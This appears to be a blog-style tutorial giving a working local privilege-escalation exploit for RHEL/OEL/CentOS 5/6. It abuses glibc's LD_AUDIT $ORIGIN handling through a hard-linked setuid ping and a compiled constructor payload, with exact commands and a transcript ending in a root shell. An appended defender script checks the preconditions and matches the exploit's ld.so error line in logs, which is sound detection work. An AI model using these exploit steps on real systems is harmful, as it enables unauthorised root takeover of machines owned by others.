
Privilege escalation from an ordinary user to root on RHEL/OEL/CentOS 5/6

You first need a shell as an ordinary (unprivileged) user.
Test environment: OEL 6.11
This should only apply to RHEL/OEL/CentOS 5/6; other versions were not tried.

Everything below is run as the ordinary user, for example the oracle user:
rm -rf /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit

Edit /tmp/payload.c with vim and write the following:
#include <unistd.h>   /* setuid */
#include <stdlib.h>   /* system */

/* Runs automatically when the dynamic linker loads this shared object. */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}

Compile it with gcc:
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

Run the following as the current ordinary user. It prints an error, and then you will find that the shell has become root:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

Note that the final LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 must be typed by hand at the command line, otherwise you will not get the root# prompt.

[root@oel6 ~]# su - oracle
[oracle@oel6 ~]$ rm -rf /tmp/exploit
[oracle@oel6 ~]$ mkdir /tmp/exploit
[oracle@oel6 ~]$ ln /bin/ping /tmp/exploit/target
[oracle@oel6 ~]$ exec 3< /tmp/exploit/target
[oracle@oel6 ~]$ rm -rf /tmp/exploit
[oracle@oel6 ~]$ cat /tmp/payload.c
void __attribute__((constructor)) init()
{
         setuid(0);
         system("/bin/bash");
}
[oracle@oel6 ~]$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
[oracle@oel6 ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@oel6 ~]# whoami
root
[root@oel6 ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@oel6 ~]# 
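
The technique above needs two things to line up: a hard link to a setuid binary must be creatable in a directory the user controls (so /tmp must be on the same filesystem as /bin), and the dynamic linker must expand $ORIGIN in LD_AUDIT for a setuid program (the unpatched glibc behaviour on these releases). The script below is an added defender-side example, not part of the original post or of the referenced exploit; it checks those preconditions, lists setuid files that carry extra hard links, and matches the ld.so error line shown in the transcript so it can be flagged in captured session or application logs. It assumes GNU coreutils/findutils (stat -c, find -perm) as shipped on RHEL-family systems; the glibc line only prints the installed package, since the fixed build number must be taken from the vendor advisory.

```shell
#!/bin/sh
# Added example (not from the original post): defender-side checks for the
# preconditions the LD_AUDIT/$ORIGIN technique depends on. Assumes GNU
# coreutils/findutils (stat -c, find -perm) as on RHEL-family systems.

# Precondition 1: a hard link to a setuid binary can only be created on the
# same filesystem. Returns 0 when both paths share a device number.
same_filesystem() {
    [ "$(stat -c %d "$1")" = "$(stat -c %d "$2")" ]
}

# Mitigation check: fs.protected_hardlinks (kernel 3.6+; absent on the
# RHEL 5/6 kernels) stops users from hard-linking files they do not own.
hardlinks_protected() {
    v=$(cat /proc/sys/fs/protected_hardlinks 2>/dev/null) || return 1
    [ "$v" = "1" ]
}

# Audit check: list setuid files under the given roots that have more than
# one hard link, i.e. a second name that may live in a writable directory.
multilinked_setuid() {
    find "$@" -xdev -type f -perm -4000 -links +1 2>/dev/null
}

# Detection: the exploit leaves the ld.so complaint seen in the transcript
# on stderr; this matches that line in a captured session or application log.
ld_audit_indicator() {
    printf '%s\n' "$1" | grep -q "cannot be loaded as audit interface"
}

report() {
    if same_filesystem /bin /tmp; then
        echo "WARN: /tmp shares a filesystem with /bin; hard links to setuid binaries are possible"
    else
        echo "OK: /tmp is a separate filesystem"
    fi
    if hardlinks_protected; then
        echo "OK: fs.protected_hardlinks=1"
    else
        echo "WARN: fs.protected_hardlinks not enabled or not available on this kernel"
    fi
    echo "Setuid files with more than one link under /tmp /var/tmp /home:"
    multilinked_setuid /tmp /var/tmp /home
    # Placeholder: compare this against the fixed glibc build in your vendor advisory.
    echo "glibc installed: $(rpm -q glibc 2>/dev/null || echo 'rpm not available')"
}

# Run the report only when asked, so the functions can also be sourced.
if [ "${RUN_REPORT:-0}" = 1 ]; then
    report
fi
```

Run it as RUN_REPORT=1 sh check.sh on the host; a separate /tmp filesystem (or a kernel with fs.protected_hardlinks) removes the hard-link step entirely, and patching glibc removes the $ORIGIN expansion, so either WARN line is worth acting on even where the other check passes.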

References:
https://www.exploit-db.com/exploits/15274
https://blog.csdn.net/mooncarp/article/details/52406990